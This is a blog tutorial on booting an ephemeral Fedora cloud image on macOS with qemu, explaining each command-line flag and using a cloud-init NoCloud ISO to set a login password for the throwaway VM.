&lt;p&gt;Many Linux distributions provide cloud images, which are generally comparable to their server versions but designed to boot without a manual install process. These types of images pair really well with &lt;a href=&quot;https://www.qemu.org/&quot;&gt;qemu&lt;/a&gt;, an open-source system emulator that can use hardware virtualisation (macOS has the &lt;a href=&quot;https://developer.apple.com/documentation/hypervisor&quot;&gt;Hypervisor framework&lt;/a&gt;) to run disposable guest operating systems.&lt;/p&gt;
&lt;p&gt;Let&#39;s make sure we have everything we need:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ brew install qemu curl gnupg xorriso
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;We can then grab the current cloud image for &lt;a href=&quot;https://fedoraproject.org/cloud/&quot;&gt;Fedora&lt;/a&gt;, but you can replace this with basically any distro you want:&lt;/p&gt;
&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;&lt;span class=&quot;token comment&quot;&gt;# I&#39;m an old man using an x86 machine, amend to aarch64 if you&#39;re fancy&lt;/span&gt;&lt;br /&gt;$ &lt;span class=&quot;token function&quot;&gt;curl&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-O&lt;/span&gt; https://download.fedoraproject.org/pub/fedora/linux/releases/38/Cloud/x86_64/images/Fedora-Cloud-Base-38-1.6.x86_64.qcow2&lt;br /&gt;$ &lt;span class=&quot;token function&quot;&gt;curl&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-O&lt;/span&gt; https://download.fedoraproject.org/pub/fedora/linux/releases/38/Cloud/x86_64/images/Fedora-Cloud-38-1.6-x86_64-CHECKSUM&lt;br /&gt;$ &lt;span class=&quot;token function&quot;&gt;curl&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-O&lt;/span&gt; https://fedoraproject.org/fedora.gpg&lt;br /&gt;$ gpgv &lt;span class=&quot;token parameter variable&quot;&gt;--keyring&lt;/span&gt; ./fedora.gpg Fedora-Cloud-38-1.6-x86_64-CHECKSUM&lt;br /&gt;$ sha256sum &lt;span class=&quot;token parameter variable&quot;&gt;-c&lt;/span&gt; Fedora-Cloud-38-1.6-x86_64-CHECKSUM&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And then run our shiny new &lt;code&gt;Fedora-Cloud-38-1.6-x86_64.img&lt;/code&gt; using &lt;code&gt;qemu&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ qemu-system-x86_64 &#92;
	-accel hvf &#92;
	-cpu host &#92;
	-m 1G &#92;
	-drive if=virtio,file=Fedora-Cloud-Base-38-1.6.x86_64.qcow2 &#92;
	-nic user,model=virtio-net-pci,hostfwd=tcp:127.0.0.1:2222-:22 &#92;
	-snapshot &#92;
	-nographic
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Woah. That&#39;s a lot. What&#39;s going on here?&lt;/p&gt;
&lt;p&gt;Your applications, for the most part, want to spend their time communicating with all the fabulous hardware you have in your computer - CPU, memory, network card, GPU, storage, etc.  However, for many eminently sensible reasons, your software isn&#39;t allowed to speak directly to this hardware, and instead sends and receives a bunch of system calls through an operating system acting as a happy intermediary.&lt;/p&gt;
&lt;p&gt;Virtualisation add another layer of indirection to all this, allowing you to run &#39;guest&#39; operating systems which &lt;em&gt;think&lt;/em&gt; they&#39;re talking directly with computer hardware but are instead talking to &lt;em&gt;another&lt;/em&gt; operating system, known as the host. Many CPUs feature technology to allow this to all happen with maximum performance and minimum overhead, and contemporary machines can offer performance &lt;em&gt;almost&lt;/em&gt; as good on many virtualisation workloads as running a single operating system communicating straight with the hardware.&lt;/p&gt;
&lt;p&gt;The magic software that makes this work is called a hypervisor, and historically there&#39;s been chat about hypervisors that operate &lt;em&gt;in place&lt;/em&gt; of a main operating system (known as Type 1) and hypervisors that operate &lt;em&gt;on top&lt;/em&gt; of an existing operating system (or Type 2). We won&#39;t go into that here - instead, we&#39;ll just enjoy a broad, top-level visualisation of how a guest operating system loosely functions:&lt;/p&gt;
&lt;img src=&quot;https://martingaston.dev/articles/boot-an-ephemeral-linux-vm-in-macos-with-qemu/hypervisor.svg&quot; alt=&quot;A hypervisor sits between a guest operating system and the host operating system&quot; /&gt;
&lt;p&gt;Qemu is quite low-level compared to other software in this space, and is perhaps more commonly used via higher-level abstractions like &lt;code&gt;libvirt&lt;/code&gt;. Running it directly exposes you to many, many, many many many command line switches, which you will continually forget time and time again. But I think there&#39;s a big advantage here, for my relatively straightforward use case at least, in that it can be housed very nicely in a little stateless, portable shell script that you check-in to version control. Also, I&#39;ve never had too much luck with &lt;code&gt;libvirt&lt;/code&gt; on macOS. And, most wonderfully, it saves you having to learn another configuration format on top.&lt;/p&gt;
&lt;p&gt;Here&#39;s what each of those flags means:&lt;/p&gt;
&lt;h6 id=&quot;-accel-hvf&quot; tabindex=&quot;-1&quot;&gt;&lt;a class=&quot;header-anchor&quot; href=&quot;https://martingaston.dev/articles/boot-an-ephemeral-linux-vm-in-macos-with-qemu/#-accel-hvf&quot;&gt;&lt;code&gt;-accel hvf&lt;/code&gt;&lt;/a&gt;&lt;/h6&gt;
&lt;p&gt;Use the macOS hypervisor framework. Computer go fast!&lt;/p&gt;
&lt;h6 id=&quot;-cpu-host&quot; tabindex=&quot;-1&quot;&gt;&lt;a class=&quot;header-anchor&quot; href=&quot;https://martingaston.dev/articles/boot-an-ephemeral-linux-vm-in-macos-with-qemu/#-cpu-host&quot;&gt;&lt;code&gt;-cpu host&lt;/code&gt;&lt;/a&gt;&lt;/h6&gt;
&lt;p&gt;This uses CPU host passthrough, which means we&#39;re &lt;em&gt;not&lt;/em&gt; emulating a CPU in our guest environment. This should give us better performance than if we, say, wanted our VM to think our x86 processor was actually an aarch64 one.&lt;/p&gt;
&lt;h6 id=&quot;-m-1g&quot; tabindex=&quot;-1&quot;&gt;&lt;a class=&quot;header-anchor&quot; href=&quot;https://martingaston.dev/articles/boot-an-ephemeral-linux-vm-in-macos-with-qemu/#-m-1g&quot;&gt;&lt;code&gt;-m 1G&lt;/code&gt;&lt;/a&gt;&lt;/h6&gt;
&lt;p&gt;This sets the amount of available memory to the guest OS. So while my machine has 16GB of memory, our Linux VM won&#39;t be able to use more than 1GB. I normally set this to as close to the production server as possible.&lt;/p&gt;
&lt;h6 id=&quot;-drive-if%3Dvirtio%2Cfile%3Dfedora-cloud-base-38-1.6.x86-64.qcow2&quot; tabindex=&quot;-1&quot;&gt;&lt;a class=&quot;header-anchor&quot; href=&quot;https://martingaston.dev/articles/boot-an-ephemeral-linux-vm-in-macos-with-qemu/#-drive-if%3Dvirtio%2Cfile%3Dfedora-cloud-base-38-1.6.x86-64.qcow2&quot;&gt;&lt;code&gt;-drive if=virtio,file=Fedora-Cloud-Base-38-1.6.x86-64.qcow2&lt;/code&gt;&lt;/a&gt;&lt;/h6&gt;
&lt;p&gt;This mounts the Fedora image file we&#39;ve downloaded as the filesystem for the VM. To do this we use VirtIO, &lt;em&gt;another&lt;/em&gt; emulation framework but for IO devices, to mount the Fedora image. macOS takes care of all of this for us.&lt;/p&gt;
&lt;h6 id=&quot;-nic-user%2Cmodel%3Dvirtio-net-pci%2Chostfwd%3Dtcp%3A127.0.0.1%3A2222-%3A22&quot; tabindex=&quot;-1&quot;&gt;&lt;a class=&quot;header-anchor&quot; href=&quot;https://martingaston.dev/articles/boot-an-ephemeral-linux-vm-in-macos-with-qemu/#-nic-user%2Cmodel%3Dvirtio-net-pci%2Chostfwd%3Dtcp%3A127.0.0.1%3A2222-%3A22&quot;&gt;&lt;code&gt;-nic user,model=virtio-net-pci,hostfwd=tcp:127.0.0.1:2222-:22&lt;/code&gt;&lt;/a&gt;&lt;/h6&gt;
&lt;p&gt;The &lt;code&gt;-nic&lt;/code&gt; flag enables networking, once again using VirtIO. User networking in qemu defaults to a &lt;code&gt;10.0.2.0/24&lt;/code&gt; address space, with the second IP in the network reserved as the address of the host: &lt;code&gt;10.0.2.2&lt;/code&gt;. We also use the &lt;code&gt;hostfwd&lt;/code&gt; option to forward port &lt;code&gt;2222&lt;/code&gt; on the host to port &lt;code&gt;22&lt;/code&gt; on the guest, for SSH.&lt;/p&gt;
&lt;h6 id=&quot;-snapshot&quot; tabindex=&quot;-1&quot;&gt;&lt;a class=&quot;header-anchor&quot; href=&quot;https://martingaston.dev/articles/boot-an-ephemeral-linux-vm-in-macos-with-qemu/#-snapshot&quot;&gt;&lt;code&gt;-snapshot&lt;/code&gt;&lt;/a&gt;&lt;/h6&gt;
&lt;p&gt;Writes to temporary files instead of the disk image, meaning everything gets nuked when the guest OS is stopped. This saves us having to make another &lt;code&gt;qcow2&lt;/code&gt; file.&lt;/p&gt;
&lt;h6 id=&quot;-nographic&quot; tabindex=&quot;-1&quot;&gt;&lt;a class=&quot;header-anchor&quot; href=&quot;https://martingaston.dev/articles/boot-an-ephemeral-linux-vm-in-macos-with-qemu/#-nographic&quot;&gt;&lt;code&gt;-nographic&lt;/code&gt;&lt;/a&gt;&lt;/h6&gt;
&lt;p&gt;This disables graphical support, and instead pipes the machine&#39;s serial port to the terminal. The main gotcha here is &lt;a href=&quot;https://www.qemu.org/docs/master/system/mux-chardev.html&quot;&gt;that you have to press Ctrl + A, then X in order to quit&lt;/a&gt;. You will definitely forget this.&lt;/p&gt;
&lt;p&gt;This is all working great, and now we get a login prompt for our machine-in-a-machine. Wait, a login? Uh oh:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Fedora Linux 38 (Cloud Edition)
Kernel 6.2.9-300.fc38.x86_64 on an x86_64 (ttyS0)

eth0: 10.0.2.15 fec0::7b27:4767:382e:dafc
localhost login:
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This can be a tricky moment. How are you supposed to login? What&#39;s the password going to be? You can try &lt;code&gt;fedora&lt;/code&gt; here, or maybe &lt;code&gt;root&lt;/code&gt; - but unfortunately you&#39;re not getting past this screen (for now).&lt;/p&gt;
&lt;p&gt;Instead of Googling the answer, we can be indulgent and poke around a bit first. Our image file is in a &lt;code&gt;qcow2&lt;/code&gt; format, which is the default for qemu. I don&#39;t know how to work directly with that on macOS, but luckily we also have &lt;code&gt;qemu-img&lt;/code&gt; which can convert to a more common &lt;code&gt;img&lt;/code&gt; format:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ qemu-img convert -f qcow2 -O raw Fedora-Cloud-Base-38-1.6.x86_64.qcow2 fedora.img
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The &lt;code&gt;fedora.img&lt;/code&gt; file contains multiple partitions, one of which contains a &lt;a href=&quot;https://en.wikipedia.org/wiki/Filesystem_Hierarchy_Standard&quot;&gt;standard Linux directory layout&lt;/a&gt;. If we mount that partition (aside: getting macOS to recognise &lt;code&gt;ext4&lt;/code&gt; and &lt;code&gt;btrfs&lt;/code&gt; filesystems is a bit of a faff that I won&#39;t cover here) we can check out the filesystem:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# /etc/shadow contains information about a system&#39;s users
$ cat /etc/shadow | grep root
root:!locked::0:99999:7:::
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;As expected, the &lt;code&gt;root&lt;/code&gt; user is locked (thanks to the &lt;code&gt;!&lt;/code&gt;) and so we can&#39;t login with a password.&lt;/p&gt;
&lt;p&gt;The next bit requires a bit of background/circular knowledge (you need to know where to check for &lt;code&gt;cloud-init&lt;/code&gt;, which you wouldn&#39;t know to do unless you knew about &lt;code&gt;cloud-init&lt;/code&gt;) but we can also check that there&#39;s a file at &lt;code&gt;/etc/cloud/cloud.cfg&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ cat /etc/cloud/cloud.cfg | wc -l
108
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This suggests our Fedora Cloud distribution is indeed using a tool called &lt;code&gt;cloud-init&lt;/code&gt; to handle its configuration, including users and groups. This isn&#39;t a surprise: it&#39;s pretty much the de facto standard for cloud images. The documentation for &lt;code&gt;cloud-init&lt;/code&gt; suggests that each distribution sets up a default user, which we can check:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ cat /etc/cloud/cloud.cfg | grep &#39;default_user:&#39; -A 6
   default_user:
     name: fedora
     lock_passwd: True
     gecos: fedora Cloud User
     groups: [wheel, adm, systemd-journal]
     sudo: [&amp;quot;ALL=(ALL) NOPASSWD:ALL&amp;quot;]
     shell: /bin/bash
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So, by the time we run this image in a VM, &lt;code&gt;cloud-init&lt;/code&gt; has done its magic and we &lt;em&gt;do&lt;/em&gt; have a &lt;code&gt;fedora&lt;/code&gt; user - but it doesn&#39;t have a password specified by default. So we can&#39;t login (yet). We need to further configure our VM instance using &lt;code&gt;cloud-init&lt;/code&gt;. The &lt;a href=&quot;https://cloudinit.readthedocs.io/en/latest/tutorial/qemu.html&quot;&gt;documentation has a pretty good tutorial&lt;/a&gt; to get up and running, which I&#39;ll mostly be recapping here.&lt;/p&gt;
&lt;p&gt;In short: we need to feed it some YAML. Of course you do, because you can&#39;t configure something intended for the cloud without &lt;em&gt;at least&lt;/em&gt; some YAML.&lt;/p&gt;
&lt;p&gt;We&#39;ll setup a directory and the relevant files:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ mkdir cloud-init &amp;amp;&amp;amp; touch cloud-init/{user,meta,vendor}-data
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And then populate our &lt;code&gt;user-data&lt;/code&gt; file:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ cat &amp;lt;&amp;lt; EOF &amp;gt; ./cloud-init/user-data
#cloud-config
password: password
chpasswd:
  expire: False

EOF
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I don&#39;t worry about the &lt;code&gt;meta-data&lt;/code&gt; and &lt;code&gt;vendor-data&lt;/code&gt; files, but having them exist (even if empty) will speed up the boot time of the VM.&lt;/p&gt;
&lt;p&gt;The next step is to get the operating system aware of these files. With &lt;a href=&quot;https://cloudinit.readthedocs.io/en/latest/reference/datasorces/nocloud.html&quot;&gt;cloud-init&#39;s NoCloud data source&lt;/a&gt;, that&#39;s done by mounting a &lt;code&gt;CIDATA&lt;/code&gt; volume or using a webserver. The latter is how the real cloud servers will operate, but that means having a webserver running in another tab and that feels like making more faff when it comes to scripting all this.&lt;/p&gt;
&lt;p&gt;Instead, we can make a CD image with &lt;code&gt;xorriso&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ xorriso -outdev ./nocloud.iso &#92;
  -joliet on &#92;
  -blank as_needed &#92;
  -map ./cloud-init/ / &#92;
  -volid CIDATA
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And return to &lt;code&gt;qemu-system-x86_64&lt;/code&gt;, mounting our &lt;code&gt;nocloud.iso&lt;/code&gt; as another drive:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ qemu-system-x86_64 &#92;
  -accel hvf &#92;
  -cpu host &#92;
  -m 1G &#92;
  -drive if=virtio,file=&amp;quot;Fedora-Cloud-Base-38-1.6.x86_64.qcow2&amp;quot; &#92;
  -drive if=virtio,file=&amp;quot;nocloud.iso&amp;quot;,index=2,media=cdrom &#92;
  -nic user,model=virtio-net-pci,hostfwd=tcp:127.0.0.1:2222-:22 &#92;
  -snapshot &#92;
  -nographic
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Whew! That&#39;s a lot. But, once that machine boots, we can login as &lt;code&gt;fedora&lt;/code&gt; and use our brand new password of &lt;code&gt;password&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Fedora Linux 38 (Cloud Edition)
Kernel 6.2.9-300.fc38.x86_64 on an x86_64 (ttyS0)

eth0: 10.0.2.15 fec0::5962:c9cc:4f1f:45fb
localhost login: fedora
Password:
[fedora@localhost ~]$ hostnamectl
     Static hostname: localhost
           Icon name: computer-vm
             Chassis: vm 🖴
          Machine ID: d6416aa014fa49268ab214be6ee827d9
             Boot ID: e6b3da91a607484d8927910580cd9a6c
      Virtualization: qemu
    Operating System: Fedora Linux 38 (Cloud Edition)
         CPE OS Name: cpe:/o:fedoraproject:fedora:38
      OS Support End: Tue 2024-05-14
OS Support Remaining: 10month 3w 1d
              Kernel: Linux 6.2.9-300.fc38.x86_64
        Architecture: x86-64
     Hardware Vendor: QEMU
      Hardware Model: Standard PC _i440FX + PIIX, 1996_
    Firmware Version: rel-1.16.2-0-gea1b7a073390-prebuilt.qemu.org
       Firmware Date: Tue 2014-04-01
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Perfect! From here there&#39;s a lot you can do that your regular containerised environment just can&#39;t reach, from exploring &lt;code&gt;systemd&lt;/code&gt;, playing around with &lt;code&gt;cgroups&lt;/code&gt; or poking around with some complicated &lt;code&gt;iptables&lt;/code&gt; commands. It&#39;s also probably worth properly setting up SSH and customising a proper user - &lt;a href=&quot;https://cloudinit.readthedocs.io/en/latest/reference/examples.html&quot;&gt;the documentation will set you off down that road&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Also: it&#39;s just cool to be able to spin up a Linux instance every now and then.&lt;/p&gt;
</content>
  </entry>
</feed>